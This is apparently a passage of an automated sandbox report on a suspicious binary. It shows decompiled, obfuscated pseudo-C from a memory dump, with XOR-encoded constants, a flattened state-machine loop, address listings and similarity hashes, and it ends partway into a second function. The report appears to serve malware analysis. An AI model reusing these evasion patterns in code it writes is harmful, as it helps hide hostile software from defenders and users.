                                                                                                                                                                                                                    				_v1596 = 0x3e811c;
                                                                                                                                                                                                                    				_v1596 = _v1596 + 0x9e90;
                                                                                                                                                                                                                    				_v1596 = _v1596 ^ 0x003e84f1;
                                                                                                                                                                                                                    				_v1740 = 0x6c00fa;
                                                                                                                                                                                                                    				_v1740 = _v1740 + 0xffff2da4;
                                                                                                                                                                                                                    				_v1740 = _v1740 + 0xffffed05;
                                                                                                                                                                                                                    				_v1740 = _v1740 ^ 0x36f3adad;
                                                                                                                                                                                                                    				_v1740 = _v1740 ^ 0x3691f914;
                                                                                                                                                                                                                    				_v1616 = 0x5f4a64;
                                                                                                                                                                                                                    				_v1616 = _v1616 + 0xffff12de;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0x0059e5c7;
                                                                                                                                                                                                                    				_v1688 = 0x7a504f;
                                                                                                                                                                                                                    				_v1688 = _v1688 << 1;
                                                                                                                                                                                                                    				_v1688 = _v1688 * 0x11;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0x1037e275;
                                                                                                                                                                                                                    				_v1704 = 0xf91bfe;
                                                                                                                                                                                                                    				_v1704 = _v1704 * 0x58;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0x4f56d18f;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0x6ee7634f;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0x741bc864;
                                                                                                                                                                                                                    				_v1668 = 0x758b9c;
                                                                                                                                                                                                                    				_v1668 = _v1668 + 0xffff88a8;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x22c1a3ca;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x22bb2af0;
                                                                                                                                                                                                                    				_v1744 = 0x6b5dc1;
                                                                                                                                                                                                                    				_v1744 = _v1744 << 8;
                                                                                                                                                                                                                    				_v1744 = _v1744 + 0x437e;
                                                                                                                                                                                                                    				_v1744 = _v1744 ^ 0xda238810;
                                                                                                                                                                                                                    				_v1744 = _v1744 ^ 0xb17865d4;
                                                                                                                                                                                                                    				_v1640 = 0xcf4d8;
                                                                                                                                                                                                                    				_v1640 = _v1640 >> 2;
                                                                                                                                                                                                                    				_v1640 = _v1640 ^ 0x00038099;
                                                                                                                                                                                                                    				_v1648 = 0x6fd224;
                                                                                                                                                                                                                    				_v1648 = _v1648 + 0xffff01ac;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x0060c3fe;
                                                                                                                                                                                                                    				_v1684 = 0xff1cd1;
                                                                                                                                                                                                                    				_v1684 = _v1684 + 0x6272;
                                                                                                                                                                                                                    				_v1684 = _v1684 + 0xffff8260;
                                                                                                                                                                                                                    				_v1684 = _v1684 ^ 0x00f632a1;
                                                                                                                                                                                                                    				_v1752 = 0xfc0165;
                                                                                                                                                                                                                    				_v1752 = _v1752 | 0x7fdbf2cf;
                                                                                                                                                                                                                    				_v1752 = _v1752 >> 6;
                                                                                                                                                                                                                    				_v1752 = _v1752 ^ 0x01f64da7;
                                                                                                                                                                                                                    				_v1760 = 0x4788b0;
                                                                                                                                                                                                                    				_t542 = 0x25;
                                                                                                                                                                                                                    				_v1760 = _v1760 * 0x49;
                                                                                                                                                                                                                    				_v1760 = _v1760 + 0xb3b2;
                                                                                                                                                                                                                    				_v1760 = _v1760 / _t542;
                                                                                                                                                                                                                    				_v1760 = _v1760 ^ 0x00870b8c;
                                                                                                                                                                                                                    				_v1576 = 0xb71bf4;
                                                                                                                                                                                                                    				_v1576 = _v1576 | 0xed184bc8;
                                                                                                                                                                                                                    				_v1576 = _v1576 ^ 0xedb9ca19;
                                                                                                                                                                                                                    				_v1612 = 0x1b9902;
                                                                                                                                                                                                                    				_t543 = 0x68;
                                                                                                                                                                                                                    				_v1612 = _v1612 / _t543;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0x000d4a52;
                                                                                                                                                                                                                    				_v1588 = 0xea9c8f;
                                                                                                                                                                                                                    				_t544 = 0xb;
                                                                                                                                                                                                                    				_v1588 = _v1588 * 0x54;
                                                                                                                                                                                                                    				_v1588 = _v1588 ^ 0x4cfb1788;
                                                                                                                                                                                                                    				_v1652 = 0x369d21;
                                                                                                                                                                                                                    				_v1652 = _v1652 >> 2;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0x000ca5b3;
                                                                                                                                                                                                                    				_v1584 = 0x9b1c75;
                                                                                                                                                                                                                    				_v1584 = _v1584 / _t544;
                                                                                                                                                                                                                    				_v1584 = _v1584 ^ 0x000cec67;
                                                                                                                                                                                                                    				_v1732 = 0x41fcdd;
                                                                                                                                                                                                                    				_v1732 = _v1732 << 0xd;
                                                                                                                                                                                                                    				_v1732 = _v1732 * 0x7f;
                                                                                                                                                                                                                    				_v1732 = _v1732 + 0xffffafbb;
                                                                                                                                                                                                                    				_v1732 = _v1732 ^ 0x8e373c87;
                                                                                                                                                                                                                    				_v1676 = 0x613b4e;
                                                                                                                                                                                                                    				_v1676 = _v1676 << 0xc;
                                                                                                                                                                                                                    				_v1676 = _v1676 / _t490;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0x00435b2d;
                                                                                                                                                                                                                    				_v1728 = 0x26cd7d;
                                                                                                                                                                                                                    				_v1728 = _v1728 + 0x9ed0;
                                                                                                                                                                                                                    				_v1728 = _v1728 / _t553;
                                                                                                                                                                                                                    				_v1728 = _v1728 + 0xffff610d;
                                                                                                                                                                                                                    				_v1728 = _v1728 ^ 0xfff7477d;
                                                                                                                                                                                                                    				_v1608 = 0xc00c2e;
                                                                                                                                                                                                                    				_v1608 = _v1608 + 0x3a87;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x00c82f42;
                                                                                                                                                                                                                    				_v1664 = 0x868122;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0x6cb8801f;
                                                                                                                                                                                                                    				_v1664 = _v1664 >> 9;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0x003e31cc;
                                                                                                                                                                                                                    				_v1692 = 0x20b824;
                                                                                                                                                                                                                    				_v1692 = _v1692 << 0xd;
                                                                                                                                                                                                                    				_v1692 = _v1692 << 0x10;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x8009a98a;
                                                                                                                                                                                                                    				_v1600 = 0x510187;
                                                                                                                                                                                                                    				_v1600 = _v1600 >> 0xe;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x0009a22b;
                                                                                                                                                                                                                    				_v1696 = 0xf939db;
                                                                                                                                                                                                                    				_t545 = 0x34;
                                                                                                                                                                                                                    				_v1696 = _v1696 / _t545;
                                                                                                                                                                                                                    				_v1696 = _v1696 >> 0xf;
                                                                                                                                                                                                                    				_t546 = 0x6a;
                                                                                                                                                                                                                    				_t554 = _v1592;
                                                                                                                                                                                                                    				_t491 = _v1592;
                                                                                                                                                                                                                    				_t547 = _v1592;
                                                                                                                                                                                                                    				_v1696 = _v1696 / _t546;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0x000b2d91;
                                                                                                                                                                                                                    				_v1656 = 0x6165e1;
                                                                                                                                                                                                                    				_v1656 = _v1656 * 0x33;
                                                                                                                                                                                                                    				_v1656 = _v1656 << 2;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0x4d98131c;
                                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                    						_t557 = _t492 - 0x6a095f4;
                                                                                                                                                                                                                    						if(_t557 <= 0) {
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						__eflags = _t492 - 0xbe028ad;
                                                                                                                                                                                                                    						if(_t492 == 0xbe028ad) {
                                                                                                                                                                                                                    							E00A7286C(_v1608, _t554, _v1664, _v1692);
                                                                                                                                                                                                                    							_t492 = 0x62cb28d;
                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						__eflags = _t492 - 0xd042200;
                                                                                                                                                                                                                    						if(_t492 == 0xd042200) {
                                                                                                                                                                                                                    							_t549 =  *0xa83b38 + 0xc;
                                                                                                                                                                                                                    							_t471 = 0x5c;
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								__eflags =  *_t549 - _t471;
                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t549 = _t549 + 2;
                                                                                                                                                                                                                    								__eflags = _t549;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t547 = _t549 + 2;
                                                                                                                                                                                                                    							_t492 = 0xf6c2cec;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						__eflags = _t492 - 0xf6c2cec;
                                                                                                                                                                                                                    						if(_t492 != 0xf6c2cec) {
                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t488 = E00A769E0(_v1616, _v1680, _t492, _v1688, _t492, _v1704);
                                                                                                                                                                                                                    						_t491 = _t488;
                                                                                                                                                                                                                    						_t555 =  &(_t555[4]);
                                                                                                                                                                                                                    						__eflags = _t488;
                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                    							return _t550;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t492 = 0x2f384d6;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t557 == 0) {
                                                                                                                                                                                                                    						E00A7E4D8(_v1712, _v1624, _t492, _t492, _v1660, _t492, _v1720,  &_v520, _v1632);
                                                                                                                                                                                                                    						_t555 =  &(_t555[7]);
                                                                                                                                                                                                                    						_t492 = 0x3b2510b;
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t492 == 0x1486db2) {
                                                                                                                                                                                                                    						E00A7114E(_t554, _v1728, _t491);
                                                                                                                                                                                                                    						_t492 = 0xbe028ad;
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t492 == 0x2f384d6) {
                                                                                                                                                                                                                    						_t476 = E00A78B56(_v1736, _t491, _v1668, _v1744, _v1640, _t492, _t547, _t492, _v1648, _v1684, _v1604,  &_v1560, _v1752, _v1760, _t492, _t492, _v1576, _v1612, _v1588, _v1652, _v1584, _v1768, _t492, _v1628, _v1732, _t547);
                                                                                                                                                                                                                    						_t554 = _t476;
                                                                                                                                                                                                                    						_t555 =  &(_t555[0x18]);
                                                                                                                                                                                                                    						__eflags = _t476;
                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                    							_t492 = 0x62cb28d;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							_t492 = 0x1486db2;
                                                                                                                                                                                                                    							_t550 = 1;
                                                                                                                                                                                                                    							_v1592 = 1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t492 == 0x3b2510b) {
                                                                                                                                                                                                                    						_push(_v1764);
                                                                                                                                                                                                                    						_push(_v1700);
                                                                                                                                                                                                                    						_push(_v1756);
                                                                                                                                                                                                                    						_t477 = E00A81E60(0xa6111c, _v1620, __eflags);
                                                                                                                                                                                                                    						E00A67582( &_v1040, __eflags);
                                                                                                                                                                                                                    						E00A7DCF9(_v1672, __eflags, _t477, _v1708,  *0xa83b38 + 0x21c, _v1636, _v1580,  &_v1040, 0x104,  &_v520,  &_v1560, _v1644, _v1748, _v1724);
                                                                                                                                                                                                                    						E00A7D6DF(_v1716, _t477, _v1596, _v1740);
                                                                                                                                                                                                                    						_t550 = _v1592;
                                                                                                                                                                                                                    						_t555 =  &(_t555[0x11]);
                                                                                                                                                                                                                    						_t492 = 0xd042200;
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t492 != 0x62cb28d) {
                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A7286C(_v1600, _t491, _v1696, _v1656);
                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                    					__eflags = _t492 - 0x3677856;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                    			}













































































                                                                                                                                                                                                                    0x00a6f443
                                                                                                                                                                                                                    0x00a6f449
                                                                                                                                                                                                                    0x00a6f459
                                                                                                                                                                                                                    0x00a6f45b
                                                                                                                                                                                                                    0x00a6f460
                                                                                                                                                                                                                    0x00a6f467
                                                                                                                                                                                                                    0x00a6f46e
                                                                                                                                                                                                                    0x00a6f476
                                                                                                                                                                                                                    0x00a6f47e
                                                                                                                                                                                                                    0x00a6f486
                                                                                                                                                                                                                    0x00a6f48e
                                                                                                                                                                                                                    0x00a6f496
                                                                                                                                                                                                                    0x00a6f49e
                                                                                                                                                                                                                    0x00a6f4a6
                                                                                                                                                                                                                    0x00a6f4b5
                                                                                                                                                                                                                    0x00a6f4ba
                                                                                                                                                                                                                    0x00a6f4c0
                                                                                                                                                                                                                    0x00a6f4c8
                                                                                                                                                                                                                    0x00a6f4cc
                                                                                                                                                                                                                    0x00a6f4d4
                                                                                                                                                                                                                    0x00a6f4df
                                                                                                                                                                                                                    0x00a6f4e7
                                                                                                                                                                                                                    0x00a6f4f2
                                                                                                                                                                                                                    0x00a6f4fa
                                                                                                                                                                                                                    0x00a6f502
                                                                                                                                                                                                                    0x00a6f50a
                                                                                                                                                                                                                    0x00a6f512
                                                                                                                                                                                                                    0x00a6f51d
                                                                                                                                                                                                                    0x00a6f525
                                                                                                                                                                                                                    0x00a6f530
                                                                                                                                                                                                                    0x00a6f53d
                                                                                                                                                                                                                    0x00a6f540
                                                                                                                                                                                                                    0x00a6f541
                                                                                                                                                                                                                    0x00a6f548
                                                                                                                                                                                                                    0x00a6f54c
                                                                                                                                                                                                                    0x00a6f559
                                                                                                                                                                                                                    0x00a6f55d
                                                                                                                                                                                                                    0x00a6f565
                                                                                                                                                                                                                    0x00a6f570
                                                                                                                                                                                                                    0x00a6f57b
                                                                                                                                                                                                                    0x00a6f586
                                                                                                                                                                                                                    0x00a6f58e
                                                                                                                                                                                                                    0x00a6f593
                                                                                                                                                                                                                    0x00a6f598
                                                                                                                                                                                                                    0x00a6f5a0
                                                                                                                                                                                                                    0x00a6f5ab
                                                                                                                                                                                                                    0x00a6f5b6
                                                                                                                                                                                                                    0x00a6f5c1
                                                                                                                                                                                                                    0x00a6f5cc
                                                                                                                                                                                                                    0x00a6f5d4
                                                                                                                                                                                                                    0x00a6f5df
                                                                                                                                                                                                                    0x00a6f5e7
                                                                                                                                                                                                                    0x00a6f5ef
                                                                                                                                                                                                                    0x00a6f5f7
                                                                                                                                                                                                                    0x00a6f5fc
                                                                                                                                                                                                                    0x00a6f604
                                                                                                                                                                                                                    0x00a6f614
                                                                                                                                                                                                                    0x00a6f61e
                                                                                                                                                                                                                    0x00a6f622
                                                                                                                                                                                                                    0x00a6f62a
                                                                                                                                                                                                                    0x00a6f632
                                                                                                                                                                                                                    0x00a6f63f
                                                                                                                                                                                                                    0x00a6f643
                                                                                                                                                                                                                    0x00a6f64b
                                                                                                                                                                                                                    0x00a6f655
                                                                                                                                                                                                                    0x00a6f65d
                                                                                                                                                                                                                    0x00a6f66c
                                                                                                                                                                                                                    0x00a6f66d
                                                                                                                                                                                                                    0x00a6f671
                                                                                                                                                                                                                    0x00a6f676
                                                                                                                                                                                                                    0x00a6f67e
                                                                                                                                                                                                                    0x00a6f686
                                                                                                                                                                                                                    0x00a6f68b
                                                                                                                                                                                                                    0x00a6f693
                                                                                                                                                                                                                    0x00a6f698
                                                                                                                                                                                                                    0x00a6f6a0
                                                                                                                                                                                                                    0x00a6f6ab
                                                                                                                                                                                                                    0x00a6f6b3
                                                                                                                                                                                                                    0x00a6f6be
                                                                                                                                                                                                                    0x00a6f6c9
                                                                                                                                                                                                                    0x00a6f6d4
                                                                                                                                                                                                                    0x00a6f6df
                                                                                                                                                                                                                    0x00a6f6ea
                                                                                                                                                                                                                    0x00a6f6f2
                                                                                                                                                                                                                    0x00a6f6fd
                                                                                                                                                                                                                    0x00a6f705
                                                                                                                                                                                                                    0x00a6f70a
                                                                                                                                                                                                                    0x00a6f712
                                                                                                                                                                                                                    0x00a6f71a
                                                                                                                                                                                                                    0x00a6f722
                                                                                                                                                                                                                    0x00a6f730
                                                                                                                                                                                                                    0x00a6f734
                                                                                                                                                                                                                    0x00a6f73c
                                                                                                                                                                                                                    0x00a6f744
                                                                                                                                                                                                                    0x00a6f74c
                                                                                                                                                                                                                    0x00a6f754
                                                                                                                                                                                                                    0x00a6f759
                                                                                                                                                                                                                    0x00a6f766
                                                                                                                                                                                                                    0x00a6f76a
                                                                                                                                                                                                                    0x00a6f772
                                                                                                                                                                                                                    0x00a6f77d
                                                                                                                                                                                                                    0x00a6f788
                                                                                                                                                                                                                    0x00a6f793
                                                                                                                                                                                                                    0x00a6f79b
                                                                                                                                                                                                                    0x00a6f7a3
                                                                                                                                                                                                                    0x00a6f7ab
                                                                                                                                                                                                                    0x00a6f7b3
                                                                                                                                                                                                                    0x00a6f7bb
                                                                                                                                                                                                                    0x00a6f7c6
                                                                                                                                                                                                                    0x00a6f7d1
                                                                                                                                                                                                                    0x00a6f7dc
                                                                                                                                                                                                                    0x00a6f7e4
                                                                                                                                                                                                                    0x00a6f7ed
                                                                                                                                                                                                                    0x00a6f7f1
                                                                                                                                                                                                                    0x00a6f7f9
                                                                                                                                                                                                                    0x00a6f806
                                                                                                                                                                                                                    0x00a6f80a
                                                                                                                                                                                                                    0x00a6f812
                                                                                                                                                                                                                    0x00a6f81a
                                                                                                                                                                                                                    0x00a6f822
                                                                                                                                                                                                                    0x00a6f82a
                                                                                                                                                                                                                    0x00a6f832
                                                                                                                                                                                                                    0x00a6f83a
                                                                                                                                                                                                                    0x00a6f842
                                                                                                                                                                                                                    0x00a6f84a
                                                                                                                                                                                                                    0x00a6f84f
                                                                                                                                                                                                                    0x00a6f857
                                                                                                                                                                                                                    0x00a6f85f
                                                                                                                                                                                                                    0x00a6f867
                                                                                                                                                                                                                    0x00a6f872
                                                                                                                                                                                                                    0x00a6f87a
                                                                                                                                                                                                                    0x00a6f885
                                                                                                                                                                                                                    0x00a6f890
                                                                                                                                                                                                                    0x00a6f89b
                                                                                                                                                                                                                    0x00a6f8a6
                                                                                                                                                                                                                    0x00a6f8ae
                                                                                                                                                                                                                    0x00a6f8b6
                                                                                                                                                                                                                    0x00a6f8c0
                                                                                                                                                                                                                    0x00a6f8c8
                                                                                                                                                                                                                    0x00a6f8d0
                                                                                                                                                                                                                    0x00a6f8d8
                                                                                                                                                                                                                    0x00a6f8dd
                                                                                                                                                                                                                    0x00a6f8e5
                                                                                                                                                                                                                    0x00a6f8f4
                                                                                                                                                                                                                    0x00a6f8f7
                                                                                                                                                                                                                    0x00a6f8fb
                                                                                                                                                                                                                    0x00a6f90b
                                                                                                                                                                                                                    0x00a6f90f
                                                                                                                                                                                                                    0x00a6f917
                                                                                                                                                                                                                    0x00a6f922
                                                                                                                                                                                                                    0x00a6f92d
                                                                                                                                                                                                                    0x00a6f938
                                                                                                                                                                                                                    0x00a6f94a
                                                                                                                                                                                                                    0x00a6f94f
                                                                                                                                                                                                                    0x00a6f956
                                                                                                                                                                                                                    0x00a6f961
                                                                                                                                                                                                                    0x00a6f976
                                                                                                                                                                                                                    0x00a6f977
                                                                                                                                                                                                                    0x00a6f97e
                                                                                                                                                                                                                    0x00a6f989
                                                                                                                                                                                                                    0x00a6f994
                                                                                                                                                                                                                    0x00a6f99c
                                                                                                                                                                                                                    0x00a6f9a7
                                                                                                                                                                                                                    0x00a6f9bd
                                                                                                                                                                                                                    0x00a6f9c4
                                                                                                                                                                                                                    0x00a6f9cf
                                                                                                                                                                                                                    0x00a6f9d7
                                                                                                                                                                                                                    0x00a6f9e1
                                                                                                                                                                                                                    0x00a6f9e5
                                                                                                                                                                                                                    0x00a6f9ed
                                                                                                                                                                                                                    0x00a6f9f5
                                                                                                                                                                                                                    0x00a6f9fd
                                                                                                                                                                                                                    0x00a6fa0a
                                                                                                                                                                                                                    0x00a6fa0e
                                                                                                                                                                                                                    0x00a6fa16
                                                                                                                                                                                                                    0x00a6fa1e
                                                                                                                                                                                                                    0x00a6fa2c
                                                                                                                                                                                                                    0x00a6fa30
                                                                                                                                                                                                                    0x00a6fa38
                                                                                                                                                                                                                    0x00a6fa40
                                                                                                                                                                                                                    0x00a6fa4b
                                                                                                                                                                                                                    0x00a6fa56
                                                                                                                                                                                                                    0x00a6fa61
                                                                                                                                                                                                                    0x00a6fa69
                                                                                                                                                                                                                    0x00a6fa71
                                                                                                                                                                                                                    0x00a6fa76
                                                                                                                                                                                                                    0x00a6fa7e
                                                                                                                                                                                                                    0x00a6fa86
                                                                                                                                                                                                                    0x00a6fa8b
                                                                                                                                                                                                                    0x00a6fa90
                                                                                                                                                                                                                    0x00a6fa98
                                                                                                                                                                                                                    0x00a6faa3
                                                                                                                                                                                                                    0x00a6faab
                                                                                                                                                                                                                    0x00a6fab8
                                                                                                                                                                                                                    0x00a6fac6
                                                                                                                                                                                                                    0x00a6facb
                                                                                                                                                                                                                    0x00a6fad1
                                                                                                                                                                                                                    0x00a6fada
                                                                                                                                                                                                                    0x00a6fadd
                                                                                                                                                                                                                    0x00a6fae4
                                                                                                                                                                                                                    0x00a6faeb
                                                                                                                                                                                                                    0x00a6faf2
                                                                                                                                                                                                                    0x00a6faf6
                                                                                                                                                                                                                    0x00a6fafe
                                                                                                                                                                                                                    0x00a6fb11
                                                                                                                                                                                                                    0x00a6fb18
                                                                                                                                                                                                                    0x00a6fb20
                                                                                                                                                                                                                    0x00a6fb20
                                                                                                                                                                                                                    0x00a6fb2b
                                                                                                                                                                                                                    0x00a6fb2b
                                                                                                                                                                                                                    0x00a6fb2b
                                                                                                                                                                                                                    0x00a6fb2b
                                                                                                                                                                                                                    0x00a6fb31
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fd49
                                                                                                                                                                                                                    0x00a6fd4f
                                                                                                                                                                                                                    0x00a6fdc6
                                                                                                                                                                                                                    0x00a6fdcd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fdcd
                                                                                                                                                                                                                    0x00a6fd51
                                                                                                                                                                                                                    0x00a6fd57
                                                                                                                                                                                                                    0x00a6fd9a
                                                                                                                                                                                                                    0x00a6fd9d
                                                                                                                                                                                                                    0x00a6fda3
                                                                                                                                                                                                                    0x00a6fda3
                                                                                                                                                                                                                    0x00a6fda6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fda0
                                                                                                                                                                                                                    0x00a6fda0
                                                                                                                                                                                                                    0x00a6fda0
                                                                                                                                                                                                                    0x00a6fda8
                                                                                                                                                                                                                    0x00a6fdab
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fdab
                                                                                                                                                                                                                    0x00a6fd59
                                                                                                                                                                                                                    0x00a6fd5f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fd76
                                                                                                                                                                                                                    0x00a6fd7b
                                                                                                                                                                                                                    0x00a6fd7d
                                                                                                                                                                                                                    0x00a6fd80
                                                                                                                                                                                                                    0x00a6fd82
                                                                                                                                                                                                                    0x00a6fb85
                                                                                                                                                                                                                    0x00a6fb90
                                                                                                                                                                                                                    0x00a6fb90
                                                                                                                                                                                                                    0x00a6fd88
                                                                                                                                                                                                                    0x00a6fd88
                                                                                                                                                                                                                    0x00a6fb37
                                                                                                                                                                                                                    0x00a6fd37
                                                                                                                                                                                                                    0x00a6fd3c
                                                                                                                                                                                                                    0x00a6fd3f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fd3f
                                                                                                                                                                                                                    0x00a6fb43
                                                                                                                                                                                                                    0x00a6fcfe
                                                                                                                                                                                                                    0x00a6fd05
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fd05
                                                                                                                                                                                                                    0x00a6fb4f
                                                                                                                                                                                                                    0x00a6fcc7
                                                                                                                                                                                                                    0x00a6fccc
                                                                                                                                                                                                                    0x00a6fcce
                                                                                                                                                                                                                    0x00a6fcd1
                                                                                                                                                                                                                    0x00a6fcd3
                                                                                                                                                                                                                    0x00a6fce9
                                                                                                                                                                                                                    0x00a6fcd5
                                                                                                                                                                                                                    0x00a6fcd7
                                                                                                                                                                                                                    0x00a6fcdc
                                                                                                                                                                                                                    0x00a6fcdd
                                                                                                                                                                                                                    0x00a6fcdd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fcd3
                                                                                                                                                                                                                    0x00a6fb5b
                                                                                                                                                                                                                    0x00a6fb91
                                                                                                                                                                                                                    0x00a6fb9a
                                                                                                                                                                                                                    0x00a6fb9e
                                                                                                                                                                                                                    0x00a6fba9
                                                                                                                                                                                                                    0x00a6fbb7
                                                                                                                                                                                                                    0x00a6fc19
                                                                                                                                                                                                                    0x00a6fc32
                                                                                                                                                                                                                    0x00a6fc37
                                                                                                                                                                                                                    0x00a6fc3e
                                                                                                                                                                                                                    0x00a6fc41
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fc41
                                                                                                                                                                                                                    0x00a6fb63
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fb7d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6fdd2
                                                                                                                                                                                                                    0x00a6fdd2
                                                                                                                                                                                                                    0x00a6fdd2
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -[C$F-k$OPz$Ocn$RJ$ZO$dJ_$iWS+$n:$rb$~C$ea
                                                                                                                                                                                                                    • API String ID: 0-2533235550
                                                                                                                                                                                                                    • Opcode ID: c5038714b876732b7b1ec391ead3d6a3156086ae6c1e1a0f8a46bb419553f8a1
                                                                                                                                                                                                                    • Instruction ID: 0ce6be3ee6db82feebfca784f65ab30331800993ff069de702f6818d0d84f61a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5038714b876732b7b1ec391ead3d6a3156086ae6c1e1a0f8a46bb419553f8a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E3201715093809FD3A8CF65D94AA5BFBF2FBC4718F10891DE29A86260D7B58949CF03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                    			E00A72B4A() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				signed int _v1044;
                                                                                                                                                                                                                    				intOrPtr _v1048;
                                                                                                                                                                                                                    				signed int _v1052;
                                                                                                                                                                                                                    				signed int _v1056;
                                                                                                                                                                                                                    				signed int _v1060;
                                                                                                                                                                                                                    				signed int _v1064;
                                                                                                                                                                                                                    				signed int _v1068;
                                                                                                                                                                                                                    				signed int _v1072;
                                                                                                                                                                                                                    				signed int _v1076;
                                                                                                                                                                                                                    				signed int _v1080;
                                                                                                                                                                                                                    				signed int _v1084;
                                                                                                                                                                                                                    				signed int _v1088;
                                                                                                                                                                                                                    				signed int _v1092;
                                                                                                                                                                                                                    				signed int _v1096;
                                                                                                                                                                                                                    				signed int _v1100;
                                                                                                                                                                                                                    				signed int _v1104;
                                                                                                                                                                                                                    				signed int _v1108;
                                                                                                                                                                                                                    				signed int _v1112;
                                                                                                                                                                                                                    				unsigned int _v1116;
                                                                                                                                                                                                                    				signed int _v1120;
                                                                                                                                                                                                                    				signed int _v1124;
                                                                                                                                                                                                                    				signed int _v1128;
                                                                                                                                                                                                                    				signed int _v1132;
                                                                                                                                                                                                                    				signed int _v1136;
                                                                                                                                                                                                                    				signed int _v1140;
                                                                                                                                                                                                                    				unsigned int _v1144;
                                                                                                                                                                                                                    				signed int _v1148;
                                                                                                                                                                                                                    				signed int _v1152;
                                                                                                                                                                                                                    				signed int _v1156;
                                                                                                                                                                                                                    				signed int _v1160;
                                                                                                                                                                                                                    				signed int _v1164;
                                                                                                                                                                                                                    				signed int _v1168;
                                                                                                                                                                                                                    				signed int _v1172;
                                                                                                                                                                                                                    				signed int _v1176;
                                                                                                                                                                                                                    				short* _t320;
                                                                                                                                                                                                                    				void* _t340;
                                                                                                                                                                                                                    				void* _t344;
                                                                                                                                                                                                                    				char* _t349;
                                                                                                                                                                                                                    				signed int _t379;
                                                                                                                                                                                                                    				signed int _t380;
                                                                                                                                                                                                                    				signed int _t381;
                                                                                                                                                                                                                    				signed int _t382;
                                                                                                                                                                                                                    				signed int _t383;
                                                                                                                                                                                                                    				signed int _t384;
                                                                                                                                                                                                                    				signed int* _t387;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t387 =  &_v1176;
                                                                                                                                                                                                                    				_v1044 = _v1044 & 0x00000000;
